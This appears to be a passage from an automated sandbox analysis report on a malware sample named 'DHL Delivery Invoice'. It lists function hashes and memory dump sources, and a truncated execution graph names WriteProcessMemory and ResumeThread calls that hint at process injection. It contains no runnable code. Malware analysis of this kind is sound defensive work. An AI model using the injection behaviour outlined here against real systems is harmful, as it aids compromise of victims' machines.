                                                                                                                                  • Opcode ID: 7817671c6c23bf1e0b814be372778b1eacaa34867d2a8712e34f7dcc345dee07
                                                                                                                                  • Instruction ID: b3bc8da193bc12ceba79fd2c460d88b82c795d0230c5714d9b33a76009618e5a
                                                                                                                                  • Opcode Fuzzy Hash: 7817671c6c23bf1e0b814be372778b1eacaa34867d2a8712e34f7dcc345dee07
                                                                                                                                  • Instruction Fuzzy Hash: 00012430B101200FDB55CABC8910B2FABD6EBC5B10F14C87AF10ACB395DE25DC424790
                                                                                                                                  Function 0653A357 Relevance: .1, Instructions: 56COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000009.00000002.4279098124.0000000006530000.00000040.00000800.00020000.00000000.sdmp, Offset: 06530000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_9_2_6530000_DHL Delivery Invoice.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: a0dab19227090ddef1afd0461cb80f5031f60fb47ce1169955120cd382adcee3
                                                                                                                                  • Instruction ID: 6812f8daf2c98decf4c3b8fa0468720ceeebaa5f24d1520a38e95787768af09b
                                                                                                                                  • Opcode Fuzzy Hash: a0dab19227090ddef1afd0461cb80f5031f60fb47ce1169955120cd382adcee3
                                                                                                                                  • Instruction Fuzzy Hash: 1F01D431B106241FDB65DA38D855B6F7BE6EB86B10F00886AF14AC7355EF26ED018BC1
                                                                                                                                  Function 065338F8 Relevance: .1, Instructions: 55COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000009.00000002.4279098124.0000000006530000.00000040.00000800.00020000.00000000.sdmp, Offset: 06530000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_9_2_6530000_DHL Delivery Invoice.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 1c531954a8b9097c89014aeb514c53f01bf7ca3f0672b27817a2e78f977e2e60
                                                                                                                                  • Instruction ID: b97a53f2e55ebd177530ed07f427ed9e3855cff9faafe0a1942f6aafeed7f907
                                                                                                                                  • Opcode Fuzzy Hash: 1c531954a8b9097c89014aeb514c53f01bf7ca3f0672b27817a2e78f977e2e60
                                                                                                                                  • Instruction Fuzzy Hash: B121E0B6D00269EFCB00DF9AD984ACEFBB4FB48710F50812AE518B7240C774A554CFA5
                                                                                                                                  Function 00B0D3B7 Relevance: .1, Instructions: 53COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000009.00000002.4256567066.0000000000B0D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B0D000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_9_2_b0d000_DHL Delivery Invoice.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 48042a67946fd5b471a152cae87ddc5a96e5ad52caa5f07da488830fbc7c129d
                                                                                                                                  • Instruction ID: 6652eeb8aed4b1e6fe96ccaa8552178b570a8723e872266d7c2184c181449fb2
                                                                                                                                  • Opcode Fuzzy Hash: 48042a67946fd5b471a152cae87ddc5a96e5ad52caa5f07da488830fbc7c129d
                                                                                                                                  • Instruction Fuzzy Hash: 23118B75504280DFDB06CF54D5C4B19BFA2FB84314F24C6AAD8494B796C33AE84ACBA2
                                                                                                                                  Function 00B0D03F Relevance: .1, Instructions: 53COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000009.00000002.4256567066.0000000000B0D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B0D000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_9_2_b0d000_DHL Delivery Invoice.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 48042a67946fd5b471a152cae87ddc5a96e5ad52caa5f07da488830fbc7c129d
                                                                                                                                  • Instruction ID: 5d7d8a3ab556b043001d95a77a9aaa4b01a7aeaa2c04eb521434947efe490286
                                                                                                                                  • Opcode Fuzzy Hash: 48042a67946fd5b471a152cae87ddc5a96e5ad52caa5f07da488830fbc7c129d
                                                                                                                                  • Instruction Fuzzy Hash: DE11DD75504284CFCB11CF50D9C4B16BFA2FB84318F24C6AED8494B6A2C33AD84ACF62
                                                                                                                                  Function 00B0D207 Relevance: .1, Instructions: 53COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000009.00000002.4256567066.0000000000B0D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B0D000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_9_2_b0d000_DHL Delivery Invoice.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 72d23902bf60047e6ac5528eaef86f122a9a091f4bdaa5726a35430d0a81cb07
                                                                                                                                  • Instruction ID: 70781312f0c695d7b364e81d7234f1c631402cd5f6a9fc93625a520730c10450
                                                                                                                                  • Opcode Fuzzy Hash: 72d23902bf60047e6ac5528eaef86f122a9a091f4bdaa5726a35430d0a81cb07
                                                                                                                                  • Instruction Fuzzy Hash: 3E11BF76504284CFDB12CF54D5C4B56FFA1FB84324F24C6AADC494B696C33AD81ACBA2
                                                                                                                                  Function 0653FF2B Relevance: .1, Instructions: 53COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000009.00000002.4279098124.0000000006530000.00000040.00000800.00020000.00000000.sdmp, Offset: 06530000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_9_2_6530000_DHL Delivery Invoice.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: c570cf21b9396bd2863c3d6fc8b6467d5fcb5ba541b7dc6d6439567a0bc20dc9
                                                                                                                                  • Instruction ID: 9c6312560e8a7dcaba9402734c9452419d0a83b165f1cfacdb03e916f9706c75
                                                                                                                                  • Opcode Fuzzy Hash: c570cf21b9396bd2863c3d6fc8b6467d5fcb5ba541b7dc6d6439567a0bc20dc9
                                                                                                                                  • Instruction Fuzzy Hash: 2B012234A053455FCB91EBB8E8107AEBBF5FB86300F1080BAD904D7257EB348841CBA2
                                                                                                                                  Function 0653EDE9 Relevance: .1, Instructions: 53COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000009.00000002.4279098124.0000000006530000.00000040.00000800.00020000.00000000.sdmp, Offset: 06530000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_9_2_6530000_DHL Delivery Invoice.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: e399a45626b5f8aeffb4fb0d0df4b82b5ffc50fb6b5243fe701d3071b3a9d83e
                                                                                                                                  • Instruction ID: 1a9375cfb516edbd029b54159c68ebf2dec5f9ec25e214ee526dbfb1f43acec1
                                                                                                                                  • Opcode Fuzzy Hash: e399a45626b5f8aeffb4fb0d0df4b82b5ffc50fb6b5243fe701d3071b3a9d83e
                                                                                                                                  • Instruction Fuzzy Hash: 4301D435B142210FCB659A7D9850B3B67E6EBC5B20F14882AE20AC7351DA25DD024BD5
                                                                                                                                  Function 06533900 Relevance: .1, Instructions: 52COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000009.00000002.4279098124.0000000006530000.00000040.00000800.00020000.00000000.sdmp, Offset: 06530000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_9_2_6530000_DHL Delivery Invoice.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: db183b2928c81c07bafcf0cac03a68a0ed2a60b10635b19535a23fa30447d437
                                                                                                                                  • Instruction ID: 6b697ce77ea17869cc5ad8ef4ea844619ea2174609dbdd7861a2efee09fb527f
                                                                                                                                  • Opcode Fuzzy Hash: db183b2928c81c07bafcf0cac03a68a0ed2a60b10635b19535a23fa30447d437
                                                                                                                                  • Instruction Fuzzy Hash: AB11A2B5D01259EFCB00DF9AD884ADEFFB4FB49310F50812AE518A7250C375A554CFA5
                                                                                                                                  Function 06534290 Relevance: .1, Instructions: 51COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000009.00000002.4279098124.0000000006530000.00000040.00000800.00020000.00000000.sdmp, Offset: 06530000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_9_2_6530000_DHL Delivery Invoice.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 514d0c5277e292a624aa25fc2a91b2173c03ff05b4b4bf7371fc6d40c4198514
                                                                                                                                  • Instruction ID: ae0ed114997149129ad1d57c1d314e5768e8ed3f4897b7187464f294fbf9749a
                                                                                                                                  • Opcode Fuzzy Hash: 514d0c5277e292a624aa25fc2a91b2173c03ff05b4b4bf7371fc6d40c4198514
                                                                                                                                  • Instruction Fuzzy Hash: 4601D631B101200BDB5899BDD510B2FB3DAEBC8B10F10C839F10AC7344EE22DC424B84
                                                                                                                                  Function 06533C2F Relevance: .1, Instructions: 51COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000009.00000002.4279098124.0000000006530000.00000040.00000800.00020000.00000000.sdmp, Offset: 06530000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_9_2_6530000_DHL Delivery Invoice.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 02cafbe1e1d595c57cff73ac87b47b415e23b576c6ae1d0b74fb95c67e405f36
                                                                                                                                  • Instruction ID: 0e0b204edc7acf5e83cdbe0e486d728988ec47fe28813eafb760f4b728bccad9
                                                                                                                                  • Opcode Fuzzy Hash: 02cafbe1e1d595c57cff73ac87b47b415e23b576c6ae1d0b74fb95c67e405f36
                                                                                                                                  • Instruction Fuzzy Hash: BE01A231B100384BDFA49A69DD146EF33ABAFC8A40F04853AD90AE7284EF60CC1647D5
                                                                                                                                  Function 0653EDF8 Relevance: .0, Instructions: 49COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000009.00000002.4279098124.0000000006530000.00000040.00000800.00020000.00000000.sdmp, Offset: 06530000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_9_2_6530000_DHL Delivery Invoice.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 9461ef6b6068701c1ad6f44d8190b4ed14a8bb974e09cf452e2da290e711bc83
                                                                                                                                  • Instruction ID: 20cfba34b8cf36056d2de83da51b9f8dfb66f764da5366de960528181ba7ca48
                                                                                                                                  • Opcode Fuzzy Hash: 9461ef6b6068701c1ad6f44d8190b4ed14a8bb974e09cf452e2da290e711bc83
                                                                                                                                  • Instruction Fuzzy Hash: 19018131B102210BCB65997D9451B2F63DAE7C9B20F10883AE60AC7344EE26DC024BD5
                                                                                                                                  Function 0653A368 Relevance: .0, Instructions: 46COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000009.00000002.4279098124.0000000006530000.00000040.00000800.00020000.00000000.sdmp, Offset: 06530000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_9_2_6530000_DHL Delivery Invoice.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: ade0149f1280d9ce4bab02e594735052fccd94b74590028d038d90823b3d4ae1
                                                                                                                                  • Instruction ID: ee70572d7ec016e0be733b0f77488c2c6c2b64bc3772fd0fa60b6385de33cbc7
                                                                                                                                  • Opcode Fuzzy Hash: ade0149f1280d9ce4bab02e594735052fccd94b74590028d038d90823b3d4ae1
                                                                                                                                  • Instruction Fuzzy Hash: AA013C31B105244FDB65AA7DD554B2EB3D6EB8AB50F10C829E54AC7354EE26ED018BC0
                                                                                                                                  Function 00AFD8C5 Relevance: .0, Instructions: 45COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000009.00000002.4256234823.0000000000AFD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00AFD000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_9_2_afd000_DHL Delivery Invoice.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 9e759cdb9b513dba306809d0e43a8c3eaf404e658332f533e4f2924da40935a7
                                                                                                                                  • Instruction ID: ec8a22c7b8c8cf764ec7438e0f2bc3a3b7c844e40d2878c2d6cbbc1ec66c9b20
                                                                                                                                  • Opcode Fuzzy Hash: 9e759cdb9b513dba306809d0e43a8c3eaf404e658332f533e4f2924da40935a7
                                                                                                                                  • Instruction Fuzzy Hash: 0501FC310083489AE7124BA5CDC4777BFA9DF41364F18C46AFE094A186C275D840C671
                                                                                                                                  Function 0653C840 Relevance: .0, Instructions: 43COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000009.00000002.4279098124.0000000006530000.00000040.00000800.00020000.00000000.sdmp, Offset: 06530000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_9_2_6530000_DHL Delivery Invoice.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 77d0ce6c88f06bee6dfcbb3b28c984f6fb92e5f7e39708761abe8c4400f9b17f
                                                                                                                                  • Instruction ID: 540a06302117568eefd86438c4fcdc3de5b2c916ff9ed60c3d7c6bc19c987a74
                                                                                                                                  • Opcode Fuzzy Hash: 77d0ce6c88f06bee6dfcbb3b28c984f6fb92e5f7e39708761abe8c4400f9b17f
                                                                                                                                  • Instruction Fuzzy Hash: C301C831F212289BCF58EA79E841A9DB775F784710F108539E905F7345DB32A9058BC0
                                                                                                                                  Function 00AFD8C4 Relevance: .0, Instructions: 36COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000009.00000002.4256234823.0000000000AFD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00AFD000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_9_2_afd000_DHL Delivery Invoice.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: fb89ea11a1e7eb850518e61562b4ebec396aee4c4616ead60d966e630359eecc
                                                                                                                                  • Instruction ID: fe5b6cbc02c9a370f7f79a56e1813ee556612b9b0994e703ac3dc1fd81387ce5
                                                                                                                                  • Opcode Fuzzy Hash: fb89ea11a1e7eb850518e61562b4ebec396aee4c4616ead60d966e630359eecc
                                                                                                                                  • Instruction Fuzzy Hash: D1F0C272008344AAE7118F56CCC4B62FFA8EB51324F18C45AFE484A286C2B99840CA70
                                                                                                                                  Function 0653FF48 Relevance: .0, Instructions: 29COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000009.00000002.4279098124.0000000006530000.00000040.00000800.00020000.00000000.sdmp, Offset: 06530000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_9_2_6530000_DHL Delivery Invoice.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 0fb1c254b5a95f877997403188de2cd931dc25fd8211f704866ce0d4a1493612
                                                                                                                                  • Instruction ID: 0aa75f3b86a866ef59d37da69ffaa310d96948d6c38bebf746cafdabc3b98ef9
                                                                                                                                  • Opcode Fuzzy Hash: 0fb1c254b5a95f877997403188de2cd931dc25fd8211f704866ce0d4a1493612
                                                                                                                                  • Instruction Fuzzy Hash: 8EF05874A102098FDB80EFB8855022EB7F6BB89200F10817D8909E7359EB748941CBA2
                                                                                                                                  Function 065364C9 Relevance: .0, Instructions: 29COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000009.00000002.4279098124.0000000006530000.00000040.00000800.00020000.00000000.sdmp, Offset: 06530000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_9_2_6530000_DHL Delivery Invoice.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 303c37b19de06342e1dc7dde7a94c4e9b1aa19ea255720ff5cb814bd082c2383
                                                                                                                                  • Instruction ID: edc9b1dbc141270cc5d30e9da3d9ead42db988a024fba2f4a54db87597858017
                                                                                                                                  • Opcode Fuzzy Hash: 303c37b19de06342e1dc7dde7a94c4e9b1aa19ea255720ff5cb814bd082c2383
                                                                                                                                  • Instruction Fuzzy Hash: D2E06830E1929A7BDF60CB70D994B8B7BADF702204F1088E8E004CB102F176CE0087A1

                                                                                                                                  Non-executed Functions

                                                                                                                                  Function 065376F8 Relevance: 13.0, Strings: 10, Instructions: 468COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000009.00000002.4279098124.0000000006530000.00000040.00000800.00020000.00000000.sdmp, Offset: 06530000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_9_2_6530000_DHL Delivery Invoice.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID: $kq$$kq$$kq$$kq$$kq$$kq$$kq$$kq$$kq$$kq
                                                                                                                                  • API String ID: 0-1324371161
                                                                                                                                  • Opcode ID: ab60bf35a978501dd7f1babc4ffaa7c51149ccef158519098e7dec4a3f67f9a2
                                                                                                                                  • Instruction ID: c2d3dbdf9ec718c107ebde2ebbe96edbaf6308c8fc561a30098a3580248cc181
                                                                                                                                  • Opcode Fuzzy Hash: ab60bf35a978501dd7f1babc4ffaa7c51149ccef158519098e7dec4a3f67f9a2
                                                                                                                                  • Instruction Fuzzy Hash: B9123F70E01229CFDB64EF65C994A9EB7F2BF88700F208569D409AB365DB349D85CF84
                                                                                                                                  Function 0653A990 Relevance: 10.2, Strings: 8, Instructions: 229COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000009.00000002.4279098124.0000000006530000.00000040.00000800.00020000.00000000.sdmp, Offset: 06530000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_9_2_6530000_DHL Delivery Invoice.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID: $kq$$kq$$kq$$kq$$kq$$kq$$kq$$kq
                                                                                                                                  • API String ID: 0-1078448309
                                                                                                                                  • Opcode ID: 9602b2b89fd5de8cd2e59ff94a7aa7dd2fe2bece8f4d68e3e9f8377460d31dc2
                                                                                                                                  • Instruction ID: f28b032008e8c0a333f0a5bdf6de97c16e21bb53356e87257769138f82336758
                                                                                                                                  • Opcode Fuzzy Hash: 9602b2b89fd5de8cd2e59ff94a7aa7dd2fe2bece8f4d68e3e9f8377460d31dc2
                                                                                                                                  • Instruction Fuzzy Hash: 4D919F30A1021DDFEB68EF64D654BAEB7F2BF84700F208429E445AB395DB799C45CB90
                                                                                                                                  Function 065370F8 Relevance: 7.9, Strings: 6, Instructions: 405COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000009.00000002.4279098124.0000000006530000.00000040.00000800.00020000.00000000.sdmp, Offset: 06530000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_9_2_6530000_DHL Delivery Invoice.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID: $kq$$kq$$kq$$kq$$kq$$kq
                                                                                                                                  • API String ID: 0-1342094364
                                                                                                                                  • Opcode ID: 83f5511f743eb7a6487685cc2bae958181c5405c5b329b4d0a6614c2948bbbb8
                                                                                                                                  • Instruction ID: e083ed9a6e979182b95fadb9fd32d77c20a77297a5c80db448a354c93df2ed90
                                                                                                                                  • Opcode Fuzzy Hash: 83f5511f743eb7a6487685cc2bae958181c5405c5b329b4d0a6614c2948bbbb8
                                                                                                                                  • Instruction Fuzzy Hash: 61F15070A01218CFDB58EF68C554A6EB7F2BF88700F208569D409AB369CB35EC46CB54
                                                                                                                                  Function 06538428 Relevance: 5.3, Strings: 4, Instructions: 282COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000009.00000002.4279098124.0000000006530000.00000040.00000800.00020000.00000000.sdmp, Offset: 06530000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_9_2_6530000_DHL Delivery Invoice.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID: $kq$$kq$$kq$$kq
                                                                                                                                  • API String ID: 0-2881790790
                                                                                                                                  • Opcode ID: 3a05feb7864693d76c0e8a6b977a45bf474e994b4fbb10831b44fb487d046054
                                                                                                                                  • Instruction ID: 300c0bcf3b71aab852d4224d7031cc10ecca09c5493935c02e2284d462e5fc73
                                                                                                                                  • Opcode Fuzzy Hash: 3a05feb7864693d76c0e8a6b977a45bf474e994b4fbb10831b44fb487d046054
                                                                                                                                  • Instruction Fuzzy Hash: 0BB14C30A11219CFDB68EF65C5446AEB7F2BF84700F248869E409AB395DB75DC86CB90
                                                                                                                                  Function 06538840 Relevance: 5.2, Strings: 4, Instructions: 168COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000009.00000002.4279098124.0000000006530000.00000040.00000800.00020000.00000000.sdmp, Offset: 06530000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_9_2_6530000_DHL Delivery Invoice.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID: LRkq$LRkq$$kq$$kq
                                                                                                                                  • API String ID: 0-2392252538
                                                                                                                                  • Opcode ID: afd2f19f2c666bf965ce198fc4e8f838886a367da6982cbb291bd648f59f5ca4
                                                                                                                                  • Instruction ID: 0901304895e0dc385176d9d884b2eb20cbcced817ec3c240712208feb60ea654
                                                                                                                                  • Opcode Fuzzy Hash: afd2f19f2c666bf965ce198fc4e8f838886a367da6982cbb291bd648f59f5ca4
                                                                                                                                  • Instruction Fuzzy Hash: 7E51B031B002158FDB58EF68D944A6AB7E2FF88710F148969F4169B3A9DB35EC44CB90
                                                                                                                                  Function 0653AD18 Relevance: 5.2, Strings: 4, Instructions: 165COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000009.00000002.4279098124.0000000006530000.00000040.00000800.00020000.00000000.sdmp, Offset: 06530000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_9_2_6530000_DHL Delivery Invoice.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID: $kq$$kq$$kq$$kq
                                                                                                                                  • API String ID: 0-2881790790
                                                                                                                                  • Opcode ID: ad2e765f920722acc31df7a60d7ce2377f8cafdb67796175db34ee40c4ead88d
                                                                                                                                  • Instruction ID: ab7862ec9d8e1f967520768ae7d90af456795503abf2d5e99a987fc169fd2a42
                                                                                                                                  • Opcode Fuzzy Hash: ad2e765f920722acc31df7a60d7ce2377f8cafdb67796175db34ee40c4ead88d
                                                                                                                                  • Instruction Fuzzy Hash: CE51AF34E102158FCFA4EB64D580AAEB3B2FF84711F208969E85AAB355DB34DC45CF90

                                                                                                                                  Execution Graph

                                                                                                                                  Execution Coverage:13%
                                                                                                                                  Dynamic/Decrypted Code Coverage:100%
                                                                                                                                  Signature Coverage:0%
                                                                                                                                  Total number of Nodes:222
                                                                                                                                  Total number of Limit Nodes:19
                                                                                                                                  execution_graph 38422 2e610f2 38427 2e62940 38422->38427 38446 2e629ae 38422->38446 38466 2e62950 38422->38466 38423 2e61126 38428 2e6296a 38427->38428 38429 2e6298e 38428->38429 38485 2e633a7 38428->38485 38489 2e63207 38428->38489 38497 2e63166 38428->38497 38505 2e62f1d 38428->38505 38509 2e632d3 38428->38509 38514 2e63292 38428->38514 38518 2e63315 38428->38518 38523 2e63355 38428->38523 38528 2e62ff4 38428->38528 38533 2e62c94 38428->38533 38539 2e63268 38428->38539 38544 2e62ca0 38428->38544 38550 2e635c0 38428->38550 38554 2e62ee2 38428->38554 38559 2e630a5 38428->38559 38567 2e63444 38428->38567 38429->38423 38447 2e6293c 38446->38447 38448 2e629b1 38446->38448 38449 2e63166 4 API calls 38447->38449 38450 2e63207 4 API calls 38447->38450 38451 2e633a7 2 API calls 38447->38451 38452 2e63444 2 API calls 38447->38452 38453 2e630a5 4 API calls 38447->38453 38454 2e62ee2 2 API calls 38447->38454 38455 2e635c0 2 API calls 38447->38455 38456 2e62ca0 2 API calls 38447->38456 38457 2e63268 2 API calls 38447->38457 38458 2e62c94 2 API calls 38447->38458 38459 2e62ff4 2 API calls 38447->38459 38460 2e63355 2 API calls 38447->38460 38461 2e63315 2 API calls 38447->38461 38462 2e63292 2 API calls 38447->38462 38463 2e632d3 2 API calls 38447->38463 38464 2e6298e 38447->38464 38465 2e62f1d 2 API calls 38447->38465 38449->38464 38450->38464 38451->38464 38452->38464 38453->38464 38454->38464 38455->38464 38456->38464 38457->38464 38458->38464 38459->38464 38460->38464 38461->38464 38462->38464 38463->38464 38464->38423 38465->38464 38467 2e6296a 38466->38467 38468 2e6298e 38467->38468 38469 2e63166 4 API calls 38467->38469 38470 2e63207 4 API calls 38467->38470 38471 2e633a7 2 API calls 38467->38471 38472 2e63444 2 API calls 38467->38472 38473 2e630a5 4 API calls 38467->38473 38474 2e62ee2 2 API calls 38467->38474 38475 2e635c0 2 API calls 38467->38475 38476 2e62ca0 2 API calls 38467->38476 38477 2e63268 2 API calls 38467->38477 38478 2e62c94 2 API calls 38467->38478 38479 2e62ff4 2 API calls 38467->38479 38480 2e63355 2 API calls 38467->38480 38481 2e63315 2 API calls 38467->38481 38482 2e63292 2 API calls 38467->38482 38483 2e632d3 2 API calls 38467->38483 38484 2e62f1d 2 API calls 38467->38484 38468->38423 38469->38468 38470->38468 38471->38468 38472->38468 38473->38468 38474->38468 38475->38468 38476->38468 38477->38468 38478->38468 38479->38468 38480->38468 38481->38468 38482->38468 38483->38468 38484->38468 38572 2e60a45 38485->38572 38576 2e60a48 38485->38576 38486 2e633d5 38486->38429 38490 2e6320d 38489->38490 38495 2e60a45 WriteProcessMemory 38490->38495 38496 2e60a48 WriteProcessMemory 38490->38496 38491 2e62ed8 38492 2e62eea 38491->38492 38580 86afe30 38491->38580 38584 86afe38 38491->38584 38492->38429 38495->38491 38496->38491 38498 2e630a6 38497->38498 38501 2e60a45 WriteProcessMemory 38498->38501 38502 2e60a48 WriteProcessMemory 38498->38502 38499 2e62ed8 38500 2e62eea 38499->38500 38503 86afe38 ResumeThread 38499->38503 38504 86afe30 ResumeThread 38499->38504 38500->38429 38501->38499 38502->38499 38503->38499 38504->38499 38588 2e60470 38505->38588 38592 2e60478 38505->38592 38506 2e62f37 38506->38429 38510 2e6326b 38509->38510 38596 2e60980 38510->38596 38600 2e60988 38510->38600 38511 2e63885 38604 2e60b34 38514->38604 38608 2e60b38 38514->38608 38515 2e632b4 38519 2e62ed8 38518->38519 38520 2e62eea 38519->38520 38521 86afe38 